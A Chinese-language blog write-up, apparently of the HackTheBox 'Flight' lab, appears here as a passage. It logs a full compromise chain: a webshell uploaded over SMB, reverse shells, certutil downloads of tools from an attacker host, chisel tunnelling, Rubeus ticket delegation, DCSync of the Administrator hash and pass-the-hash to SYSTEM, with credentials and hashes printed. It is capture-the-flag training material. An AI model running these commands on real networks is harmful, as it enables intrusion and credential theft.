SMB         10.129.228.120  445    G0               C$                              Default share
SMB         10.129.228.120  445    G0               IPC$            READ            Remote IPC
SMB         10.129.228.120  445    G0               NETLOGON        READ            Logon server share 
SMB         10.129.228.120  445    G0               Shared          READ,WRITE      
SMB         10.129.228.120  445    G0               SYSVOL          READ            Logon server share 
SMB         10.129.228.120  445    G0               Users           READ            
SMB         10.129.228.120  445    G0               Web             READ,WRITE

该用户可以写入一个名叫web的目录

┌──(root㉿kaada)-[/opt/ntlm_theft/exploit]
└─# smbclient //flight.htb/Web -U c.bum 'Tikkycoll_431012284' 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Jun 18 15:13:15 2026
  ..                                  D        0  Thu Jun 18 15:13:15 2026
  flight.htb                          D        0  Thu Jun 18 15:12:01 2026
  school.flight.htb                   D        0  Thu Jun 18 15:12:01 2026

		5056511 blocks of size 4096. 1253970 blocks available
smb: \>

┌──(root㉿kaada)-[/opt/ntlm_theft/exploit]
└─# smbclient //flight.htb/Web -U c.bum 'Tikkycoll_431012284' 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Jun 18 15:13:15 2026
  ..                                  D        0  Thu Jun 18 15:13:15 2026
  flight.htb                          D        0  Thu Jun 18 15:12:01 2026
  school.flight.htb                   D        0  Thu Jun 18 15:12:01 2026

		5056511 blocks of size 4096. 1253970 blocks available
smb: \> cd flight.htb\
smb: \flight.htb\> dir
  .                                   D        0  Thu Jun 18 15:12:01 2026
  ..                                  D        0  Thu Jun 18 15:12:01 2026
  css                                 D        0  Thu Jun 18 15:12:01 2026
  images                              D        0  Thu Jun 18 15:12:01 2026
  index.html                          A     7069  Thu Feb 24 05:58:10 2022
  js                                  D        0  Thu Jun 18 15:12:01 2026

		5056511 blocks of size 4096. 1253714 blocks available
smb: \flight.htb\>

此为网站根目录，上传一个aspx马。

（勾八。。。忘了他是apache架构的了，上传php马才对）

┌──(root㉿kaada)-[/opt/ntlm_theft/exploit]
└─# cp /home/kali/Downloads/webshell.php .
                                                                                                                
┌──(root㉿kaada)-[/opt/ntlm_theft/exploit]
└─# smbclient //flight.htb/Web -U c.bum 'Tikkycoll_431012284'
Try "help" to get a list of possible commands.
smb: \> cd flight.htb\
smb: \flight.htb\> put webshell.php
putting file webshell.php as \flight.htb\webshell.php (9.3 kB/s) (average 9.3 kB/s)
smb: \flight.htb\>

上传nc等工具，反弹shell

┌──(root㉿kaada)-[/opt/ntlm_theft/exploit]
└─# smbclient //flight.htb/Web -U c.bum 'Tikkycoll_431012284'
Try "help" to get a list of possible commands.
smb: \> cd flight.htb\
smb: \flight.htb\> dir
  .                                   D        0  Thu Jun 18 15:27:01 2026
  ..                                  D        0  Thu Jun 18 15:27:01 2026
  css                                 D        0  Thu Jun 18 15:27:01 2026
  images                              D        0  Thu Jun 18 15:27:01 2026
  index.html                          A     7069  Thu Feb 24 05:58:10 2022
  js                                  D        0  Thu Jun 18 15:27:01 2026

		5056511 blocks of size 4096. 1253426 blocks available
smb: \flight.htb\> upload webshell.php
upload: command not found
smb: \flight.htb\> put webshell.php
putting file webshell.php as \flight.htb\webshell.php (19.7 kB/s) (average 19.7 kB/s)
smb: \flight.htb\>

见鬼了这靶机还有自净功能，会定期清理web目录。

那就直接传个弹shell的木马上去吧

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./penelope.py 
[+] Listening for reverse shells on 0.0.0.0:4444 -> 127.0.0.1 • 192.168.21.128 • 192.168.56.104 • 192.168.10.150 • 172.17.0.1 • 172.18.0.1 • 198.18.0.1 • 10.10.14.31 
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] [New Reverse Shell] => flight.htb 10.129.228.120 WINDOWS 👤  😍️ Session ID <1> 
[+] Added readline support... 
[+] Interacting with session [1] • Readline • Menu key Ctrl-D ⇐ 
[+] Session log: /home/kali/.penelope/sessions/flight.htb~10.129.228.120-WINDOWS/2026_06_18-08_34_16-576.log 
──────────────────────────────────────────────────────────────────────────────────────────────────────────────── 
C:\xampp\htdocs\flight.htb>

见鬼了Penelope一点都靠不住，还是手动的好使

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# nc -lvvp 4444
listening on [any] 4444 ...
connect to [10.10.14.31] from flight.htb [10.129.228.120] 49260
SOCKET: Shell has connected! PID: 2772
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\flight.htb>whoami
flight\svc_apache

C:\xampp\htdocs\flight.htb>

上传一些必要的工具

c:\Users\Public>certutil -urlcache -split -f "http://10.10.14.31/nc64.exe" nc64.exe
****  Online  ****
  0000  ...
  b0d8
CertUtil: -URLCache command completed successfully.

c:\Users\Public>certutil -urlcache -split -f "http://10.10.14.31/RunasCs.exe" RunasCs.exe
****  Online  ****
  0000  ...
  ca00
CertUtil: -URLCache command completed successfully.

c:\Users\Public> certutil -urlcache -split -f "http://10.10.14.31/winPEASany.exe" winPEASany.exe

***  Online  ****
  000000  ...
  a9de00
CertUtil: -URLCache command completed successfully.

c:\Users\Public>

切换到另一个用户

c:\Users\Public>.\RunasCs.exe c.bum Tikkycoll_431012284 cmd.exe -r 10.10.14.31:5555  
[*] Warning: The logon for user 'c.bum' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-74417$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 8 created in background.

c:\Users\Public>

c:\Users\C.Bum>type desktop\user.txt
type desktop\user.txt
e8337e2e095c01a3abd0db3fcc313dff

检查端口

ʍ΍΍΍΍͹ Current TCP Listening Ports (T1049)
ƠCheck for services restricted from the outside 
  Enumerating IPv4 connections

  Protocol   Local Address         Local Port    Remote Address        Remote Port     State             Process ID      Process Name

  TCP        0.0.0.0               80            0.0.0.0               0               Listening         5244            httpd
  TCP        0.0.0.0               88            0.0.0.0               0               Listening         656             lsass
  TCP        0.0.0.0               135           0.0.0.0               0               Listening         916             svchost
  TCP        0.0.0.0               389           0.0.0.0               0               Listening         656             lsass
  TCP        0.0.0.0               443           0.0.0.0               0               Listening         5244            httpd
  TCP        0.0.0.0               445           0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               464           0.0.0.0               0               Listening         656             lsass
  TCP        0.0.0.0               593           0.0.0.0               0               Listening         916             svchost
  TCP        0.0.0.0               636           0.0.0.0               0               Listening         656             lsass
  TCP        0.0.0.0               3268          0.0.0.0               0               Listening         656             lsass
  TCP        0.0.0.0               3269          0.0.0.0               0               Listening         656             lsass
  TCP        0.0.0.0               5985          0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               8000          0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               9389          0.0.0.0               0               Listening         2636            Microsoft.ActiveDirectory.WebServices
  TCP        0.0.0.0               47001         0.0.0.0               0               Listening         4               System
  TCP        0.0.0.0               49664         0.0.0.0               0               Listening         500             wininit
  TCP        0.0.0.0               49665         0.0.0.0               0               Listening         1172            svchost
  TCP        0.0.0.0               49666         0.0.0.0               0               Listening         1604            svchost
  TCP        0.0.0.0               49667         0.0.0.0               0               Listening         656             lsass
  TCP        0.0.0.0               49673         0.0.0.0               0               Listening         656             lsass
  TCP        0.0.0.0               49674         0.0.0.0               0               Listening         656             lsass
  TCP        0.0.0.0               49684         0.0.0.0               0               Listening         636             services
  TCP        0.0.0.0               49695         0.0.0.0               0               Listening         2800            dns
  TCP        0.0.0.0               49723         0.0.0.0               0               Listening         2760            dfsrs
  TCP        10.129.228.120        53            0.0.0.0               0               Listening         2800            dns
  TCP        10.129.228.120        80            10.10.14.31           36472           Established       5244            httpd
  TCP        10.129.228.120        80            10.10.14.31           38352           Close Wait        5244            httpd
  TCP        10.129.228.120        139           0.0.0.0               0               Listening         4               System
  TCP        10.129.228.120        49260         10.10.14.31           4444            Established       5284            httpd
  TCP        10.129.228.120        58613         10.10.14.31           5555            Established       4756            
  TCP        127.0.0.1             53            0.0.0.0               0               Listening         2800            dns

可以看到多了个8000端口，转发出来

这里还是使用比较传统的chisel转发吧

c:\Users\C.Bum>certutil -urlcache -split -f "http://10.10.14.31/chisel.exe" chisel.exe
certutil -urlcache -split -f "http://10.10.14.31/chisel.exe" chisel.exe
****  Online  ****
  000000  ...
  a1ee00
CertUtil: -URLCache command completed successfully.

c:\Users\C.Bum>
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.228.120 - - [18/Jun/2026 09:05:57] "GET /chisel.exe HTTP/1.1" 200 -
10.129.228.120 - - [18/Jun/2026 09:06:14] "GET /chisel.exe HTTP/1.1" 200 -

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./chisel server -p 12345 --reverse
2026/06/18 09:06:52 server: Reverse tunnelling enabled
2026/06/18 09:06:52 server: Fingerprint BHsiOpG9P8Oci6aJjeDqdBcJqkGDp8Szrpqa+xIKdWE=
2026/06/18 09:06:52 server: Listening on http://0.0.0.0:12345

c:\Users\C.Bum>chisel.exe client 10.10.14.31:12345 R:8000:127.0.0.1:8000
chisel.exe client 10.10.14.31:12345 R:8000:127.0.0.1:8000
2026/06/18 09:08:22 client: Connecting to ws://10.10.14.31:12345
2026/06/18 09:08:24 client: Connected (Latency 195.6609ms)
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# ./chisel server -p 12345 --reverse
2026/06/18 09:06:52 server: Reverse tunnelling enabled
2026/06/18 09:06:52 server: Fingerprint BHsiOpG9P8Oci6aJjeDqdBcJqkGDp8Szrpqa+xIKdWE=
2026/06/18 09:06:52 server: Listening on http://0.0.0.0:12345
2026/06/18 09:08:23 server: session#1: Client version (1.11.3) differs from server version (1.10.1)
2026/06/18 09:08:23 server: session#1: tun: proxy#R:8000=>8000: Listening

这个网站是asp架构的

源码在这

c:\inetpub\development>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 1DF4-493D

 Directory of c:\inetpub\development

06/18/2026  09:17 AM    <DIR>          .
06/18/2026  09:17 AM    <DIR>          ..
04/16/2018  02:23 PM             9,371 contact.html
06/18/2026  09:17 AM    <DIR>          css
06/18/2026  09:17 AM    <DIR>          fonts
06/18/2026  09:17 AM    <DIR>          img
04/16/2018  02:23 PM            45,949 index.html
06/18/2026  09:17 AM    <DIR>          js
               2 File(s)         55,320 bytes
               6 Dir(s)   5,060,624,384 bytes free

c:\inetpub\development>

传一个aspx马上去

┌──(root㉿kaada)-[/home/kali]
└─# nc -lvvp 6666
listening on [any] 6666 ...
connect to [10.10.14.31] from flight.htb [10.129.228.120] 65227
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool

c:\windows\system32\inetsrv>whoami /all
whoami /all

USER INFORMATION
----------------

User Name                  SID                                                          
========================== =============================================================
iis apppool\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes                                        
========================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level       Label            S-1-16-12288                                                   
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                       Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS                          Alias            S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
                                           Unknown SID type S-1-5-82-0   Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

c:\windows\system32\inetsrv>

SeImpersonatePrivilege Impersonate a client after authentication Enabled

godpatato，我还记得你

好吧其实正规解法是使用该权限申请票据然后dcsync

c:\Users\Public>certutil -urlcache -split -f "http://10.10.14.31/Rubeus.exe" Rubeus.exe
certutil -urlcache -split -f "http://10.10.14.31/Rubeus.exe" Rubeus.exe
****  Online  ****
  000000  ...
  06d200
CertUtil: -URLCache command completed successfully.

c:\Users\Public>

c:\Users\Public>Rubeus.exe tgtdeleg /nowrap
Rubeus.exe tgtdeleg /nowrap

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0 


[*] Action: Request Fake Delegation TGT (current user)

[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/g0.flight.htb'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: rLe+6vNJB5BEMrJ9j2BfnHH4pEahLXaJbnfL4yBuyAc=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):

      doIFVDCCBVCgAwIBBaEDAgEWooIEZDCCBGBhggRcMIIEWKADAgEFoQwbCkZMSUdIVC5IVEKiHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkZMSUdIVC5IVEKjggQgMIIEHKADAgESoQMCAQKiggQOBIIEChO9meSYyUGdjeR6CHEy899Tu/y8wFF8KjhDwD/ARJiZFXaZH+H1CvrQJSGOhit8o5a/AKEZJZFJ765JBlBHyEjuSMMyhvjxmuUQxLYpQeG4/KNk/57zgFqkIPHpEdf38M+Yj+xLZybT6RKCdUU4KGWxObNEnvcIugpQrYHvCCNfKGYaoQ7ohPwN3y/LzoGvPLn2pTQy04Dkdgtkp603yh0cWtuQhGsZF++p5iaVcyOxaJvkXwOx7JqWY4LaI9tTCvciXmqD62VQeMUhUKkWgS1d3BRANxcQt/OJ24BvJyuo0PCERI6lRHkX02/4QUHk+9ZsgZvEPmXdQMO212O/iFQvWyip3pjRAfrtEpTUHnEd27y+nY0Ox2FflmqDwJBxaxZmrK3G4B3xowdZ5/WDXCKs/u3k6jQCCAnj3UJ5IdKNfLidNEXGDYiNxmRwPxPeM+cCME3vH60ZjUiHXmx0UwR9bz81TNjeI3qF/Db5Dxpx0pl2m4htC/Jf4eiUs86aWOKoF+QbxZHyt9YgFrfXOv5dDEz69CqsV4b5P+XIBc4/pxXkcxyjW+ukjttDG56xdvdrVneyKdv5+/MR6ShuXuED0fQ1eNxcHosGXDNJdMWeeRa/DcMueohJAxvIrn/QOHeza1UAfUt780vo2/g2caIMHLnsgYYgmpd1yGeN9spgVcOzM7tpIlvhRuWukqieh7HfoobZsZ/tSM/hKMRSiBEBqEFO4Tu9lN2/n0D5qqKzHLnMEdQZL6pwun0o3DR8sA4u2agCuzJ/EwNtT7eoVUtjnlXgqsVUS8wzP/L2h1xpQ7VqB6XfRcGT9GUDyyWEkuuJRYCdoiKzc8gbhtvGyNru/3wSQksXiMRa/WLgx10kuAbN+O+wQ7u9xC3a9UQKjqEhfQtF97iwMGKB8N0uN5Be1kVKpMEhS3u1NAE3hwojzmkBeNqvszCQwLCqKVT7+QRohv7qfr08mk6kfREce2Z3rd5dFt/zc1RNPnRbpnYoFsh87JTTZRwcG6fixRxxjyu6sz21IDNlLDu/t+mU4NYDKa6qY7LlA5lQDN/7QwjJ5xqKaxnpdPJbwJH+QdINc7xgDTw6WAXMyVAnI7JVw66DkXWpXlw/Kn4wjWuW23ybtEoiJtvLEGbcmUVmxBpH7b0bGkRLrdvDGjpm5pbiS+2SZ4M3wMDL/ELepHQy/IlN3aBrJwTNs3XzH7yzvxi0/oSI/vjjW2710cKSdM48OjmNKudQr0ypf2l5nVi7B5o3Tt2gwZiup+oHNvJHlt3hUWSnssxEWZFvcAMhHA0nNk7qf5rrq3KpbDQzXbKtBV5szhzNrUmbtnV6fxt5ONCij+tuiz91YJ/cb1YfIMTZbYK2SAEdFM53WgtWo4HbMIHYoAMCAQCigdAEgc19gcowgceggcQwgcEwgb6gKzApoAMCARKhIgQgPySnWGLZRWs0b/FDXsRvS0WF/JtXYFrU6Qdl51bg7t2hDBsKRkxJR0hULkhUQqIQMA6gAwIBAaEHMAUbA0cwJKMHAwUAYKEAAKURGA8yMDI2MDYxODE2Mzk1OFqmERgPMjAyNjA2MTkwMjM5NThapxEYDzIwMjYwNjI1MTYzOTU4WqgMGwpGTElHSFQuSFRCqR8wHaADAgECoRYwFBsGa3JidGd0GwpGTElHSFQuSFRC

使用 minikerberos-kirbi2ccache 进行票据格式转换

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# minikerberos-kirbi2ccache ticket.kirbi ticket.ccache
INFO:root:Parsing kirbi file /home/kali/Desktop/ticket.kirbi
INFO:root:Done!

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# minikerberos-kirbi2ccache ticket.kirbi ticket.ccache
INFO:root:Parsing kirbi file /home/kali/Desktop/ticket.kirbi
INFO:root:Done!
                                                                                                                                                                                                                                     
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# export KRB5CCNAME=ticket.ccache
                                                                                                                                                                                                                                     
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# sudo ntpdate 10.129.228.120
2026-06-18 16:44:35.018250 (+0000) +25201.127685 +/- 0.045837 10.129.228.120 s1 no-leap
CLOCK: time stepped by 25201.127685
                                                                                                                                                                                                                                     
┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-secretsdump -k -no-pass g0.flight.htb -just-dc-user administrator
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:08c3eb806e4a83cdc660a54970bf3f3043256638aea2b62c317feffb75d89322
Administrator:aes128-cts-hmac-sha1-96:735ebdcaa24aad6bf0dc154fcdcb9465
Administrator:des-cbc-md5:c7754cb5498c2a2f
[*] Cleaning up...

直接登录即可

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-psexec Administrator@flight.htb -hashes aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on flight.htb.....
[*] Found writable share ADMIN$
[*] Uploading file YupGHLaF.exe
[*] Opening SVCManager on flight.htb.....
[*] Creating service IUcq on flight.htb.....
[*] Starting service IUcq.....
[!] Press help for extra shell commands                                                                                                                                                                                             Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami                                                                                                                                                                                                         nt authority\system

C:\Windows\system32>

不知道为什么psexec会缺字符

┌──(root㉿kaada)-[/home/kali/Desktop]
└─# impacket-smbexec Administrator@10.129.228.120 -hashes aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32> type c:\users\administrator\desktop\root.txt
9131885ea46313a5ee0f36d645727a69

C:\Windows\system32>

#HTB

HackThebox-Flight

http://example.com/2026/06/18/HackThebox-Flight/

Author

Skyarrow

Posted on

June 18, 2026

Licensed under

打靶机时遇到的代理端口及应对方法 Next